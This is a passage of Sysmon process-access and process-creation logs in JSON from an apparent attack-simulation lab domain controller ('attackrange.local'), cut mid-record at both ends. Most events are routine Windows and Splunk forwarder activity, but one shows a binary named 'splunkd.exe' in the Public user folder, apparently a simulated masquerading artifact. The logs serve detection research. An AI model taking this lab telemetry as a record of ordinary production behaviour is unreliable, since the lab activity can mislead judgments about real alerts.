06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-001033350900}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-001033350900}","TargetProcessId":"4768","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.401\r\nSourceProcessGUID: {E2A3D6B1-1239-5F25-0000-001033350900}\r\nSourceProcessId: 4768\r\nSourceThreadId: 4824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.401","SourceProcessGUID":"{E2A3D6B1-1239-5F25-0000-001033350900}","SourceProcessId":"4768","SourceThreadId":"4824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.949\r\nProcessGuid: {E2A3D6B1-1239-5F25-0000-0010FD360900}\r\nProcessId: 2716\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.949","ProcessGuid":"{E2A3D6B1-1239-5F25-0000-0010FD360900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-0010FD360900}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-0010FD360900}","TargetProcessId":"2716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-0010FD360900}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-0010FD360900}","TargetProcessId":"2716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 